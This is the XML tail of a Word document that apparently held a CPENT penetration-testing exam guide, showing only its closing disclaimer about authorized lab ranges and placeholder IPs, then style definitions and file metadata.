      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">End of guide. All commands are for the authorized CPENT ranges / your lab only; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>the IPs are placeholder examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> — substitute your range's addressing. CPENT/LPT Master is won on methodology, reliable pivoting/double-pivoting into segmented networks, chaining across the five ranges, and a clear professional report — document every step with evidence as you go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A814D3A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRDefault="00F17F75"/>
    <w:sectPr w:rsidR="00F17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E17FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66D0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5661AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E47E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D21678"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="428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2E2677"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACD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87469D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95A2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6F74F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6C6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EBA66E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="249A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874994">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="241526255">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="238174947">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1235701276">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="465661011">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="404958652">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="116683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F75"/>
    <w:rsid w:val="00D14093"/>
    <w:rsid w:val="00F1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16E77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9E549D37-CE3A-4C32-A7A6-7AFE9877A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7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F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F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F7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17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slate-300">
    <w:name w:val="text-slate-300"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F17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7F7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7F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7F7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7F75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F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-class">
    <w:name w:val="hljs-selector-class"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00F17F75"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17F75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F17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4894</Words>
  <Characters>27902</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>232</Lines>
  <Paragraphs>65</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>32731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V</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Akash V</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-15T06:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-15T06:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>